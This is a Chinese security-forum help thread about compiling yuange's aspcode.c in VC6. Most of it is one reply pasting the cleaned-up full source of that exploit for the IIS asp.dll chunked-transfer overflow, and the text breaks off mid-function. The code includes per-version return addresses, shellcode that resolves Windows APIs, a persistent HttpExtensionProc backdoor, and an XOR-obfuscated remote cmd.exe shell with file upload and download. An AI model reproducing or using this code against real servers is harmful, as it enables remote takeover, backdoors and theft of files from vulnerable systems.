[求助]用VC编译yuange的 aspcode.c 和 exover.c-软件逆向-看雪-安全社区|安全招聘|kanxue.com

最新回复 (5)
jeffcjh 雪币： 58 活跃值： (28) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 267 粉丝 0 关注私信	jeffcjh 2 楼对于兄弟的第二个代码aspcode.c，到该网址上L复制出代码后，粘贴到VC6编辑器中，直接编译会报告一大堆错误，仔细看一下，都是一些源代码字符串不符合规定造成的，基本上都是变量名或常量名或注释被不适当的的回车换行符给截断了，造成VC误解出错，只要将它们调整到一行上即可编译通过。注：直接在IE地址栏打开网址 http://www.packetstormsecurity.org/0209-exploits/aspcode.c 看到的是不换行的“通篇”代码，很难看的，这时可以点击鼠标右键查看源文件，看到的代码就是整齐的了。一个小技巧。附调整后的代码供参考： /* aspcode.c ver1.0 iis4.0、iis5.0、iis5.1 asp.dll overflow program copy by yuange <yuange@nsfocus.com> 2002.4.24 / #include <windows.h> #include <winsock.h> #include <stdio.h> #include <httpext.h> #pragma comment(lib,"ws2_32") //#define RETEIPADDR eipwin2000 #define FNENDLONG 0x08 #define NOPCODE 0x90 #define NOPLONG 0x50 #define BUFFSIZE 0x20000 #define PATHLONG 0x12 #define RETEIPADDRESS 0x468 #define SHELLBUFFSIZE 0x800 #define SHELLFNNUMS 14 #define DATABASE 0x61 #define DATAXORCODE 0x55 #define LOCKBIGNUM 19999999 #define LOCKBIGNUM2 13579139 #define MCBSIZE 0x8 #define MEMSIZE 0xb200 #define SHELLPORT 0x1f90 //0x1f90=8080 #define WEBPORT 80 void shellcodefnlock(); void shellcodefnlock2(); void shellcodefn(char ecb); void shellcodefn2(char ecb); void cleanchkesp(char fnadd,char shellbuff,char chkespadd ,int len); void iisput(int fd,char str); void iisget(int fd,char str); void iiscmd(int fd,char str); void iisreset(); void iisdie(); void iishelp(); int newrecv(int fd,char buff,int size,int flag); int newsend(int fd,char buff,int size,int flag); int xordatabegin; int lockintvar1,lockintvar2; char lockcharvar; int main(int argc, char argv) { char server; char str="LoadLibraryA""\x0""CreatePipe""\x0" "CreateProcessA""\x0""CloseHandle""\x0" "PeekNamedPipe""\x0" "ReadFile""\x0""WriteFile""\x0" "CreateFileA""\x0" "GetFileSize""\x0" "GetLastError""\x0" "Sleep""\x0" "\x09""ntdll.dll""\x0""RtlEnterCriticalSection""\x0" "\x09""asp.dll""\x0""HttpExtensionProc""\x0" "\x09""msvcrt.dll""\x0""memcpy""\x0""\x0" "cmd.exe""\x0""\x0d\x0a""exit""\x0d\x0a""\x0" "XORDATA""\x0""xordatareset""\x0" "strend"; // char buff0[]="TRACK / HTTP/1.1\nHOST:"; char buff1[]="GET /"; char buff2[]="default.asp"; char buff2add; char buff3[]="?!!ko "; char buff4[]=" HTTP/1.1 \nHOST:"; char buff5[]="\nContent-Type: application/x-www-form-urlencoded"; char buff51[]="\nTransfer-Encoding:chunked"; char buff6[]="\nContent-length: 2147506431\r\n\r\n"; // 0x80000000+MEMSIZE-1 char buff61[]="\nContent-length: 4294967295\r\n\r\n"; // 0xffffffff char buff7[]= "\x10\x00\x01\x02\x03\x04\x05\x06\x1c\xf0\xfd\x7f\x20\x21\x00\x01"; char buff11[]= "\x02\x00\x01\x02\x03\x04\x05\x06\x22\x22\x00\x01\x22\x22\x00\x01"; char buff10[]="\x20\x21\x00\x01\x20\x21\x00\x01"; char buff9[]= "\x20\x21\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"; char buff8[]= "\x81\xec\xff\xe4\x90\x90\x90\x90\x90\x90\x90\x90\x90"; /* char buff10[]="\x10\x00\x01\x02\x03\x04\x05\x06\x1d\x21\x00\x01\xec\x21\x00\x01"; char buff11[]="\x10\x00\x01\x02\x03\x04\x05\x06\x20\x21\x00\x01\x01\x21\x00\x01"; char buff12[]="\x10\x00\x01\x02\x03\x04\x05\x06\x21\x21\x00\x01\x00\x21\x00\x01"; char buff13[]="\x10\x00\x01\x02\x03\x04\x05\x06\x22\x21\x00\x01\xff\x21\x00\x01"; char buff14[]="\x10\x00\x01\x02\x03\x04\x05\x06\x23\x21\x00\x01\xe4\x21\x00\x01"; char buff15[]="\x10\x00\x01\x02\x03\x04\x05\x06\x24\x21\x00\x01\x90\x21\x00\x01"; / char fnendstr="\x90\x90\x90\x90\x90\x90\x90\x90\x90"; char SRLF[]="\x0d\x0a\x00\x00"; char eipexceptwin2000add; char eipexceptwin20002[]="\x80\x70\x9f\x74"; // push ebx ; ret address char eipexceptwin2000cn[]="\x73\x67\xfa\x7F"; // push ebx ; ret address char eipexceptwin2000[]="\x80\x70\x97\x74"; // char eipexceptwin2000[]="\xb3\x9d\xfa\x77"; // \x01\x78"; // call ebx address char eipexceptwin2000msvcrt[]="\xD3\xCB\x01\x78"; char eipexceptwin2000sp2[]="\x02\xbc\x01\x78"; // char eipexceptwin2000[]="\x0B\x08\x5A\x68"; // char eipexceptwin2000[]="\x32\x8d\x9f\x74"; char eipexceptwinnt[] ="\x82\x01\xfc\x7F"; // push esi ; ret address // char eipexceptwinnt[] ="\x2e\x01\x01\x78"; // call esi address // char eipexcept2[]="\xd0\xae\xdc\x77"; // char buff[BUFFSIZE]; char recvbuff[BUFFSIZE]; char shellcodebuff[BUFFSIZE]; char shellcodebuff2[BUFFSIZE]; struct sockaddr_in s_in2,s_in3; struct hostent he; char shellcodefnadd,chkespadd; unsigned int sendpacketlong,buff2long,shelladd,packlong; int i,j,k,l,strheadlong; unsigned char temp; int fd; u_short port,port1,shellcodeport; SOCKET d_ip; WSADATA wsaData; int offset=0; int OVERADD=RETEIPADDRESS; int result; fprintf(stderr,"\n IIS ASP.DLL OVERFLOW PROGRAM 2.0 ."); fprintf(stderr,"\n copy by yuange 2002.4.24."); fprintf(stderr,"\n welcome to my homepage http://yuange.yeah.net ."); fprintf(stderr,"\n welcome to http://www.nsfocus.com ."); fprintf(stderr,"\n usage: %s <server> [aspfile] [webport] [winxp] \n", argv[0]); buff2add=buff2; if(argc <2){ fprintf(stderr,"\n please enter the web server:"); gets(recvbuff); for(i=0;i<strlen(recvbuff);++i){ if(recvbuff[i]!=' ') break; } server=recvbuff; if(i<strlen(recvbuff)) server+=i; fprintf(stderr,"\n please enter the .asp filename:"); gets(shellcodebuff); for(i=0;i<strlen(shellcodebuff);++i){ if(shellcodebuff[i]!=' ') break; } buff2add=shellcodebuff+i; printf("\n .asp file name:%s\n",buff2add); } eipexceptwin2000add=eipexceptwin2000; // printf("\n argc%d argv%s",argc,argv[5]); if(argc>5){ if(strcmp(argv[5],"cn")==0) { eipexceptwin2000add=eipexceptwin2000cn; printf("\n For the cn system.\n"); } if(strcmp(argv[5],"sp0")==0) { eipexceptwin2000add=eipexceptwin20002; printf("\n For the sp0 system.\n"); } if(strcmp(argv[5],"msvcrt")==0) { eipexceptwin2000add=eipexceptwin2000msvcrt; printf("\n Use msvcrt.dll JMP to shell.\n"); } if(strcmp(argv[5],"sp2")==0) { eipexceptwin2000add=eipexceptwin2000sp2; printf("\n Use sp2 msvcrt.dll JMP to shell.\n"); } } result= WSAStartup(MAKEWORD(1, 1), &wsaData); if (result != 0) { fprintf(stderr, "Your computer was not connected " "to the Internet at the time that " "this program was launched, or you " "do not have a 32-bit " "connection to the Internet."); exit(1); } /* if(argc>4){ offset=atoi(argv[4]); } // OVERADD+=offset; // packlong=0x10000-offset+0x8; if(offset<-0x20\|\|offset>0x20){ fprintf(stderr,"\n offset error !offset -32 --- +32 ."); gets(buff); exit(1); } / if(argc <2){ // WSACleanup( ); // exit(1); } else server = argv[1]; for(i=0;i<strlen(server);++i){ if(server[i]!=' ') break; } if(i<strlen(server)) server+=i; for(i=0;i+3<strlen(server);++i){ if(server[i]==':'){ if(server[i+1]=='\\'\|\|server[i+1]=='/'){ if(server[i+2]=='\\'\|\|server[i+2]=='/'){ server+=i; server+=3; break; } } } } for(i=1;i<=strlen(server);++i){ if(server[i-1]=='\\'\|\|server[i-1]=='/') server[i-1]=0; } d_ip = inet_addr(server); if(d_ip==-1){ he = gethostbyname(server); if(!he) { WSACleanup( ); printf("\n Can't get the ip of %s !\n",server); gets(buff); exit(1); } else memcpy(&d_ip, he->h_addr, 4); } if(argc>3) port=atoi(argv[3]); else port=WEBPORT; if(port==0) port=WEBPORT; fd = socket(AF_INET, SOCK_STREAM,0); i=8000; setsockopt(fd,SOL_SOCKET,SO_RCVTIMEO,(const char ) &i,sizeof(i)); s_in3.sin_family = AF_INET; s_in3.sin_port = htons(port); s_in3.sin_addr.s_addr = d_ip; printf("\n nuke ip: %s port %d",inet_ntoa(s_in3.sin_addr),htons(s_in3.sin_port)); if(connect(fd, (struct sockaddr )&s_in3, sizeof(struct sockaddr_in))!=0) { closesocket(fd); WSACleanup( ); fprintf(stderr,"\n connect err."); gets(buff); exit(1); } _asm{ mov ESI,ESP cmp ESI,ESP } _chkesp(); chkespadd=_chkesp; temp=chkespadd; if(temp==0xe9) { ++chkespadd; i=(int)chkespadd; chkespadd+=i; chkespadd+=4; } /* shellcodefnadd=shellcodefnlock; temp=shellcodefnadd; if(temp==0xe9) { ++shellcodefnadd; k=(int )shellcodefnadd; shellcodefnadd+=k; shellcodefnadd+=4; } for(k=0;k<=0x500;++k){ if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break; } / memset(buff,NOPCODE,BUFFSIZE); /* strcpy(buff,buff0); if(argc>6) strcat(buff,argv[6]); else strcat(buff,server); strcat(buff,"\r\n\r\n"); //Proxy_Connection: Keep-Alive\r\n"); strcat(buff,buff1); / strcpy(buff,buff1); strheadlong=strlen(buff); OVERADD+=strheadlong-1; if(argc>2) buff2add=argv[2]; for(;;++buff2add){ temp=buff2add; if(temp!='\\'&&temp!='/') break; } // printf("\nfile:%s",buff2add); buff2long=strlen(buff2add); strcat(buff,buff2add); // fprintf(stderr,"\n offset:%d\n",offset); // offset+=strheadlong-strlen(buff1); /* for(i=0x404;i<=0x500;i+=8){ memcpy(buff+offset+i,"\x42\x42\x42\x2d",4); // 0x2d sub eax,num32 memcpy(buff+offset+i+4,eipexceptwin2000add,4); } if(argc>5){ if(strcmp(argv[5],"sp2")==0) { memcpy(buff+offset+i,"\x58",1); } } for(i=0x220;i<=0x380;i+=8){ memcpy(buff+offset+i,"\x42\x42\x42\x2d",4); // 0x2d sub eax,num32 memcpy(buff+offset+i+4,eipexceptwinnt,4); } for(i=0x580;i<=0x728;i+=8){ memcpy(buff+offset+i,"\x42\x42\x42\x2d",4); // 0x2d sub eax,num32 memcpy(buff+offset+i+4,eipexceptwinnt,4); } / // winnt 0x2cc or 0x71c win2000 0x130 or 0x468 // memcpy(buff+offset+i+8,exceptret,strlen(exceptret)); shellcodefnadd=shellcodefnlock; temp=shellcodefnadd; if(temp==0xe9) { ++shellcodefnadd; k=(int )shellcodefnadd; shellcodefnadd+=k; shellcodefnadd+=4; } for(k=0;k<=0x500;++k){ if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break; } memset(shellcodebuff2,NOPCODE,BUFFSIZE); i=0x1000; memcpy(shellcodebuff2+i+4,shellcodefnadd+k+8,0x100); shellcodefnadd=shellcodefn; temp=shellcodefnadd; if(temp==0xe9) { ++shellcodefnadd; k=(int )shellcodefnadd; shellcodefnadd+=k; shellcodefnadd+=4; } for(k=0;k<=BUFFSIZE;++k){ if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break; } // k+=0x memcpy(shellcodebuff,shellcodefnadd,k); //j); cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k); for(j=0;j<0x400;++j){ if(memcmp(str+j,"strend",6)==0) break; } memcpy(shellcodebuff+k,str,j); sendpacketlong=k+j; for(k=0;k<=0x200;++k){ if(memcmp(shellcodebuff2+i+4+k,fnendstr,FNENDLONG)==0) break; } for(j=0;j<sendpacketlong;++j){ temp=shellcodebuff[j]; // temp^=DATAXORCODE; shellcodebuff2[i+4+k]=DATABASE+temp/0x10; ++k; shellcodebuff2[i+4+k]=DATABASE+temp%0x10; ++k; } j=i+k; j=j%8+3; shellcodebuff2[i+j+k]=0; // j=strlen(shellcodebuff2)%8+3; for(j=0;j<=0xe000;j+=4){ strcat(shellcodebuff2,"\x41\x41\x41\x41"); // 0x2d sub eax,num32 // strcat(shellcodebuff2,eipexceptwin2000cn); } / strcat(shellcodebuff2,"\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x0f\x66\x83\ x6c\x24\x02\x01\x66\x81\x2c\x24\x01\x01\xff\x24\x24\xe8\xec\xff\xff\xff\ x90"); for(j=0;j<=0xb00;j+=4){ strcat(shellcodebuff2,"\x90\x90\x90\x2d"); // 0x2d sub eax,num32 } / // printf("\nbuff:%s",buff); printf("\n shellcode long 0x%x\n",sendpacketlong); if(argc>4&&strcmp(argv[4],"apache")==0){ strcat(buff," "); } else strcat(buff,buff3); printf("\n packetlong:0x%x\n",sendpacketlong); strcat(buff,buff4); if(argc>6) strcat(buff,argv[6]); else strcat(buff,server); strcat(buff,buff5); if(argc>4&&strcmp(argv[4],"apache")==0) strcat(buff," "); else strcat(buff,shellcodebuff2); // strcat(buff,buff51); if(argc>4&&(strcmp(argv[4],"winxp")==0\|\|strcmp(argv[4],"apache")==0)) { printf("\n for %s system\n",argv[4]); strcat(buff,buff61); } else strcat(buff,buff6); // printf("\n send buff:\n%s",buff); / i=strlen(buff); memset(buff+i,'a',0xc000); memset(buff+i+0xc000-strlen(buff7),0,1); strcat(buff+i+0xc000-0x10-strlen(buff7),buff7); / // strcpy(buff8,buff7); / temp=buff7[5]; temp-=offset0x10; buff7[5]=temp; i=(int )(buff7+4)+2; printf("\nSEH=0x%x\n",i); / /* for(i=0;i<8;++i){ temp=buff7[i]; printf("%2x",temp); } / / for(i=0;i<0xc000/0x10;++i){ strcat(buff,buff7); } / // printf("\nbuff=%s\n",buff); // strcat(buff,"\r\n"); // printf("\n send buff:\n%s",buff); // strcpy(buff+OVERADD+NOPLONG,shellcode); sendpacketlong=strlen(buff); // printf("buff:\n%s",buff+0x10000); / #ifdef DEBUG _asm{ lea esp,buff add esp,OVERADD ret } #endif / lockintvar1=LOCKBIGNUM2%LOCKBIGNUM; lockintvar2=lockintvar1; xordatabegin=0; for(i=0;i<1;++i){ j=sendpacketlong; // buff[0x2000]=0; fprintf(stderr,"\n send packet %d bytes.",j); // gets(buff); send(fd,buff,j,0); buff7[0]=MCBSIZE; j=MEMSIZE+0x10; i=0; if(argc>4&&strcmp(argv[4],"winxp")==0) { j=0x18; i=8; } for(k=0;i<0xc000;i+=0x10){ if(i>=j) { k=((i-j)/(MCBSIZE8)); if(k<=6){ memcpy(buff7+0x8,buff10,8); buff7[0x8]=buff8[k]; buff7[0xc]=buff9[k]; } else memcpy(buff7,buff11,0x10); } memcpy(buff+i,buff7,0x10); } if(argc>4&&strcmp(argv[4],"apache")==0){ for(k=0xb000;k<=0xc000;k+=2) { memset(buff+k,0x0d,1); memset(buff+k+1,0x0a,1); } buff[0xc000]=0; // for(k=0;k<0x10;++k) send(fd,buff,0xc000,0); // printf("\nbuff:%s\n",buff); } else send(fd,buff,0xc000,0); k=0; ioctlsocket(fd, FIONBIO, &k); j=0; while(j==0){ k=newrecv(fd,recvbuff,BUFFSIZE,0); if(k>=8&&strstr(recvbuff,"XORDATA")!=0) { xordatabegin=1; fprintf(stderr,"\n ok!recv %d bytes\n",k); recvbuff[k]=0; // printf("\n recv:%s",recvbuff); // for(k-=8,j=0;k>0;k-=4,++j)printf("recvdata:0x%x\n",(int)(recvbuff+8+4j)); k=-1; j=1; } if(k>0){ recvbuff[k]=0; fprintf(stderr,"\n recv:\n %s",recvbuff); } } } k=1; ioctlsocket(fd, FIONBIO, &k); // fprintf(stderr,"\n now begin: \n"); / for(i=0;i<strlen(SRLF);++i){ SRLF[i]^=DATAXORCODE; } send(fd,SRLF,strlen(SRLF),0); send(fd,SRLF,strlen(SRLF),0); send(fd,SRLF,strlen(SRLF),0); / k=1; l=0; while(k!=0){ if(k<0){ l=0; i=0; while(i==0){ gets(buff); if(memcmp(buff,"iish",4)==0){ iishelp(); i=2; } if(memcmp(buff,"iisput",6)==0){ iisput(fd,buff+6); i=2; } if(memcmp(buff,"iisget",6)==0){ iisget(fd,buff+6); i=2; } if(memcmp(buff,"iiscmd",6)==0){ iiscmd(fd,buff+6); i=2; } if(memcmp(buff,"iisreset",8)==0){ iisreset(fd,buff+6); i=2; } if(memcmp(buff,"iisdie",6)==0){ iisdie(fd,buff+6); i=2; } if(i==2)i=0; else i=1; } k=strlen(buff); memcpy(buff+k,SRLF,3); // send(fd,SRLF,strlen(SRLF),0); // fprintf(stderr,"%s",buff); / for(i=0;i<k+2;++i){ lockintvar2=lockintvar20x100; lockintvar2=lockintvar2%LOCKBIGNUM; lockcharvar=lockintvar2%0x100; buff[i]^=lockcharvar; // DATAXORCODE; // buff[i]^=DATAXORCODE; } send(fd,buff,k+2,0); / newsend(fd,buff,k+2,0); // send(fd,SRLF,strlen(SRLF),0); } k=newrecv(fd,buff,BUFFSIZE,0); if(xordatabegin==0&&k>=8&&strstr(buff,"XORDATA")!=0) { xordatabegin=1; k=-1; } if(k>0){ // fprintf(stderr,"recv %d bytes",k); /* if(xordatabegin==1){ for(i=0;i<k;++i){ lockintvar1=lockintvar10x100; lockintvar1=lockintvar1%LOCKBIGNUM; lockcharvar=lockintvar1%0x100; buff[i]^=lockcharvar; // DATAXORCODE; } } / l=0; buff[k]=0; fprintf(stderr,"%s",buff); } else{ Sleep(20); if(l<20) k=1; ++l; } // if(k==0) break; } closesocket(fd); WSACleanup( ); fprintf(stderr,"\n the server close connect."); gets(buff); return(0); } void shellcodefnlock() { _asm{ nop nop nop nop nop nop nop nop jmp next1 getediadd: pop edi mov esp,edi and esp,0xfffff0f0 jmp next2 getshelladd: push 0x01 mov eax,edi inc eax inc eax inc eax inc eax inc eax mov edi,eax mov esi,edi // sub sp,8 xor ecx,ecx looplock: lodsb cmp al,cl jz shell sub al,DATABASE mov ah,al lodsb sub al,DATABASE shl ah,4 add al,ah // lea eax,ptr word [edx4+al] stosb jmp looplock next1: call getediadd next2: call getshelladd shell: NOP NOP NOP NOP NOP NOP NOP NOP } } void shellcodefn(char ecb) { char Buff[SHELLBUFFSIZE+2]; int except[3]; FARPROC memcpyadd; FARPROC msvcrtdlladd; FARPROC HttpExtensionProcadd; FARPROC Aspdlladd; FARPROC RtlEnterCriticalSectionadd; FARPROC Ntdlladd; FARPROC Sleepadd; FARPROC GetLastErroradd; FARPROC GetFileSizeadd; FARPROC CreateFileAadd; FARPROC WriteFileadd; FARPROC ReadFileadd; FARPROC PeekNamedPipeadd; FARPROC CloseHandleadd; FARPROC CreateProcessadd; FARPROC CreatePipeadd; FARPROC procloadlib; FARPROC apifnadd[1]; FARPROC procgetadd=0; FARPROC writeclient; FARPROC readclient; HCONN ConnID; FARPROC shellcodefnadd=ecb; char stradd,stradd2,dooradd; int imgbase,fnbase,i,k,l,thedoor; HANDLE libhandle; int fpt; //libwsock32; STARTUPINFO siinfo; PROCESS_INFORMATION ProcessInformation; HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2; int lBytesRead; int lockintvar1,lockintvar2; char lockcharvar; int shelllocknum; // unsigned char temp; SECURITY_ATTRIBUTES sa; _asm { jmp nextcall getstradd: pop stradd lea EDI,except mov eax,dword ptr FS:[0] mov dword ptr [edi+0x08],eax mov dword ptr FS:[0],EDI } except[0]=0xffffffff; except[1]=stradd-0x07; imgbase=0x77e00000; _asm{ call getexceptretadd } for(;imgbase<0xbffa0000,procgetadd==0;){ imgbase+=0x10000; if(imgbase==0x78000000) imgbase=0xbff00000; if(( WORD )imgbase=='ZM'&& (WORD )(imgbase+(int )(imgbase+0x3c))=='EP'){ fnbase=(int )(imgbase+(int )(imgbase+0x3c)+0x78)+imgbase; k=(int )(fnbase+0xc)+imgbase; if((int )k =='NREK'&&(int )(k+4)=='23LE'){ libhandle=imgbase; k=imgbase+(int )(fnbase+0x20); for(l=0;l<(int ) (fnbase+0x18);++l,k+=4){ if((int )(imgbase+(int )k)=='PteG'&&(int )(4+imgbase+(int )k)=='Acor') { k=(WORD )(l+l+imgbase+(int )(fnbase+0x24)); k+=(int )(fnbase+0x10)-1; k=(int )(k+k+k+k+imgbase+(int )(fnbase+0x1c)); procgetadd=k+imgbase; break; } } } } } //搜索KERNEL32。DLL模块地址和API函数 GetProcAddress地址 //注意这儿处理了搜索页面不在情况。 if(procgetadd==0) goto die ; i=stradd; for(k=1;stradd!=0;++k) { if(stradd==0x9) libhandle=procloadlib(stradd+1); else apifnadd[k]=procgetadd(libhandle,stradd); for(;stradd!=0;++stradd){ } ++stradd; } ++stradd; k=0x7ffdf020; (int )k=RtlEnterCriticalSectionadd; k=stradd; stradd=i; thedoor=0; i=0; _asm{ jmp getdoorcall getdooradd: pop dooradd; mov l,esp call getexceptretadd } if(i==0){ ++i; if((int )ecb==0x90){ if((int )((int )(ecb+0x64))=='ok!!') { i=0; thedoor=1; } } } if(i!=0){ (int )(dooradd-0x0c)=HttpExtensionProcadd; (int )(dooradd-0x13)=shellcodefnadd; ecb=0; _asm{ call getexceptretadd } i=ecb; i&=0xfffff000; ecb=i; ecb+=0x1000; for(;i<l;++i,++ecb) { if((int )ecb==0x90){ if((int )(ecb+8)==(int )ecb){ if((int )(int )(ecb+0x64)=='ok!!') break; } } } i=0; _asm{ call getexceptretadd } i&=0xfffff000; i+=0x1000; for(;i<l;++i){ if((int )i==HttpExtensionProcadd){ (int )i=dooradd-7; // break; } } // (int )(dooradd-0x0c)=HttpExtensionProcadd; } writeclient= (int )(ecb+0x84); readclient = (int )(ecb+0x88); ConnID = (int )(ecb+8) ; stradd=k; _asm{ lea edi,except mov eax,dword ptr [edi+0x08] mov dword ptr fs:[0],eax } if(thedoor==0){ _asm{ mov eax,0xffffffff mov dword ptr fs:[0],eax } } stradd2=stradd; stradd+=8; k=0x20; writeclient(ConnID,(int )(ecb+0x6c),&k,0); k=8; writeclient(ConnID,stradd+9,&k,0); // Sleepadd(100); shelllocknum=LOCKBIGNUM2; if((int )(int )(ecb+0x64)=='ok!!'&&(int )((int )(ecb+0x64)+4)=='notx') shelllocknum=0; // iiscmd: lockintvar1=shelllocknum%LOCKBIGNUM; lockintvar2=lockintvar1; iiscmd: /* lockintvar1=LOCKBIGNUM2%LOCKBIGNUM; lockintvar2=lockintvar1; / sa.nLength=12; sa.lpSecurityDescriptor=0; sa.bInheritHandle=TRUE; CreatePipeadd(&hReadPipe1,&hWritePipe1,&sa,0); CreatePipeadd(&hReadPipe2,&hWritePipe2,&sa,0); // ZeroMemory(&siinfo,sizeof(siinfo)); _asm{ lea EDI,siinfo xor eax,eax mov ecx,0x11 repnz stosd } siinfo.dwFlags = STARTF_USESHOWWINDOW\|STARTF_USESTDHANDLES; siinfo.wShowWindow = SW_HIDE; siinfo.hStdInput = hReadPipe2; siinfo.hStdOutput=hWritePipe1; siinfo.hStdError =hWritePipe1; k=0; // while(k==0) // { k=CreateProcessadd(NULL,stradd2,NULL,NULL,1,0,NULL,NULL,&siinfo, &ProcessInformation); // stradd+=8; // } Sleepadd(200); // PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0); i=0; while(1) { PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0); if(lBytesRead>0) { i=0; ReadFileadd(hReadPipe1,Buff,lBytesRead,&lBytesRead,0); if(lBytesRead>0) { for(k=0;k<lBytesRead;++k){ lockintvar2=lockintvar20x100; lockintvar2=lockintvar2%LOCKBIGNUM; lockcharvar=lockintvar2%0x100; Buff[k]^=lockcharvar; // DATAXORCODE; // Buff[k]^=DATAXORCODE; } writeclient(ConnID,Buff,&lBytesRead,0); // HSE_IO_SYNC); // Sleepadd(20); } } else{ // Sleepadd(10); l=0; if(i<50){ l=1; ++i; k=1; lBytesRead=0; } while(l==0){ i=0; lBytesRead=SHELLBUFFSIZE; k=readclient(ConnID,Buff,&lBytesRead); for(l=0;l<lBytesRead;++l){ lockintvar1=lockintvar10x100; lockintvar1=lockintvar1%LOCKBIGNUM; lockcharvar=lockintvar1%0x100; Buff[l]^=lockcharvar; // DATAXORCODE; } if(k==1&&lBytesRead>=5&&Buff[0]=='i'&&Buff[1]=='i'&&Buff[2]=='s'&&Buff[3]=='c'&&Buff[4]==' '){ k=8; WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe stradd2=Buff+5; Buff[lBytesRead]=0; goto iiscmd; } if(k==1&&lBytesRead>=5&&Buff[0]=='r'&&Buff[1]=='e'&&Buff[2]=='s'&&Buff[3]=='e'&&Buff[4]=='t'){ lBytesRead=0x0c; writeclient(ConnID,stradd+0x11,&lBytesRead,0); lockintvar1=shelllocknum%LOCKBIGNUM; lockintvar2=lockintvar1; lBytesRead=0; } if(k==1&&lBytesRead>=5&&Buff[0]=='i'&&Buff[1]=='i'&&Buff[2]=='s'&&Buff[3]=='r'&&Buff[4]=='r'){ k=8; WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe (int )(dooradd-0x0c)=0; Sleepadd(0x7fffffff); _asm{ mov eax,0 mov esp,0 jmp eax } } if(k==1&&lBytesRead>4&&Buff[0]=='p'&&Buff[1]=='u'&&Buff[2]=='t'&&Buff[3] ==' ') { l=(int )(Buff+4); // WriteFileadd(fpt,Buff,lBytesRead,&lBytesRead,NULL); fpt=CreateFileAadd(Buff+0x8,FILE_FLAG_WRITE_THROUGH+ GENERIC_WRITE,FILE_SHARE_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0 ); k=GetLastErroradd(); i=0; while(l>0){ lBytesRead=SHELLBUFFSIZE; k=readclient(ConnID,Buff,&lBytesRead); if(k==1){ if(lBytesRead>0){ for(k=0;k<lBytesRead;++k){ lockintvar1=lockintvar10x100; lockintvar1=lockintvar1%LOCKBIGNUM; lockcharvar=lockintvar1%0x100; Buff[k]^=lockcharvar; // DATAXORCODE; } l-=lBytesRead; // if(fpt>0) WriteFileadd(fpt,Buff,lBytesRead,&lBytesRead,NULL); // else Sleepadd(010); } // if(i>100) l=0; } else { Sleepadd(0100); ++i; } if(i>10000) l=0; } CloseHandleadd(fpt); l=0; } else{ if(k==1&&lBytesRead>4&&Buff[0]=='g'&&Buff[1]=='e'&&Buff[2]=='t'&&Buff[3] ==' '){ // fpt=CreateFileAadd(Buff+4,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0); fpt=CreateFileAadd(Buff+4,GENERIC_READ,FILE_SHARE_READ+FILE_SHARE_WRITE, NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0); Sleepadd(100); l=GetFileSizeadd(fpt,&k); (int )Buff='ezis'; //size (int )(Buff+4)=l; lBytesRead=8; for(i=0;i<lBytesRead;++i){ lockintvar2=lockintvar20x100; lockintvar2=lockintvar2%LOCKBIGNUM; lockcharvar=lockintvar2%0x100; Buff[i]^=lockcharvar; // DATAXORCODE; } writeclient(ConnID,Buff,&lBytesRead,0); // HSE_IO_SYNC); // Sleepadd(100); i=0; while(l>0){ k=SHELLBUFFSIZE; ReadFileadd(fpt,Buff,k,&k,0); if(k>0){ for(i=0;i<k;++i){ lockintvar2=lockintvar20x100; lockintvar2=lockintvar2%LOCKBIGNUM ; lockcharvar=lockintvar2%0x100; Buff[i]^=lockcharvar; // DATAXORCODE; } i=0; l-=k; writeclient(ConnID,Buff,&k,0); // HSE_IO_SYNC); // Sleepadd(100); // k=readclient(ConnID,Buff,&lBytesRead); } else ++i; if(i>100) l=0; } CloseHandleadd(fpt); l=0; } else l=1; } } if(k!=1){ k=8; WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe k=GetLastErroradd(); while(k==0x2746){ if(thedoor==1) goto asmreturn; Sleepadd(0x7fffffff); //僵死 } } else{ WriteFileadd(hWritePipe2,Buff,lBytesRead,&lBytesRead,0); // Sleepadd(1000); } } } die: goto die ; _asm{ asmreturn: mov eax,HSE_STATUS_SUCCESS leave ret 04 door: push eax mov eax,[esp+0x08] mov eax,[eax+0x64] mov eax,[eax] cmp eax,'ok!!' jnz jmpold pop eax push 0x12345678 //dooradd-0x13 ret jmpold: pop eax push 0x12345678 //dooradd-0xc ret //1 jmp door //2 getdoorcall: call getdooradd //5 getexceptretadd: pop eax push eax mov edi,dword ptr [stradd] mov dword ptr [edi-0x0e],eax ret errprogram: mov eax,dword ptr [esp+0x0c] add eax,0xb8 mov dword ptr [eax],0x11223344 //stradd-0xe xor eax,eax //2 ret //1 execptprogram: jmp errprogram //2 bytes stradd-7 nextcall: call getstradd //5 bytes NOP NOP NOP NOP NOP NOP NOP NOP NOP } } void cleanchkesp(char fnadd,char shellbuff,char * chkesp,int len) { int i,k; unsigned char temp; char calladd; for(i=0;i<len;++i){ temp=shellbuff[i]; if(temp==0xe8){ k=(int )(shellbuff+i+1); calladd=fnadd; calladd+=k; calladd+=i; calladd+=5; if(calladd==chkesp){ shellbuff[i]=0x90; shellbuff[i+1]=0x43; // inc ebx shellbuff[i+2]=0x4b; // dec ebx shellbuff[i+3]=0x43; shellbuff[i+4]=0x4b; } } } } void iisput(int fd,char str){ char filename; char filename2; FILE fpt; char buff[0x2000]; int size=0x2000,i,j,filesize,filesizehigh; filename="\0"; filename2="\0"; j=strlen(str); 